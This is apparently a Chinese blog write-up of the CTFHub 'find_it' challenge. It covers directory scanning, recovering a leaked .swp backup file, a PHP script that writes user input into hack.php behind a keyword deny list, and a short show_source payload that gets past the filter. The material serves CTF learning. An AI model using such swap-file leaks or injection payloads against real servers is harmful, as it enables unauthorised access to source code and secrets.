0
点赞
收藏
分享

微信扫一扫

CTFHUB find_it

先峰老师 2022-04-24 阅读 106

CTFHUB find_it


dirsearch扫描

robots.txt

When I was a child,I also like to read Robots.txt

Here is what you want: 1ndexx.php

1ndexx.php无法访问;

扫缓存.1ndexx.php.swp

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Typora\typora-user-images\image-20220424103248315.png)]

<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

直接访问hack.php无法访问

show_source()读取文件:

?code=<?php show_source(__FILE__);?>

再次访问hack.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GWNyYFQa-1650768257309)(C:\Users\27969\AppData\Roaming\Typora\typora-user-images\image-20220424103444551.png)]


关于show_source()

show_source() 函数对文件进行语法高亮显示。
本函数是 highlight_file() 的别名

关于.swp缓存文件

文件泄露(.swp备份文件)

调用这类的隐藏文件的时候,需要在最前面加.

参考链接:https://blog.csdn.net/haijiege/article/details/85230327

举报

相关推荐

Ctfhub

CTFHUB SSRF

ctfhub 目录遍历

CTFHub | 远程包含

ctfhub-sql注入

CTFHub XSS DOM 跳转

ctfhub文件上传---.htaccess

CTFHub——XSS——反射型

0 条评论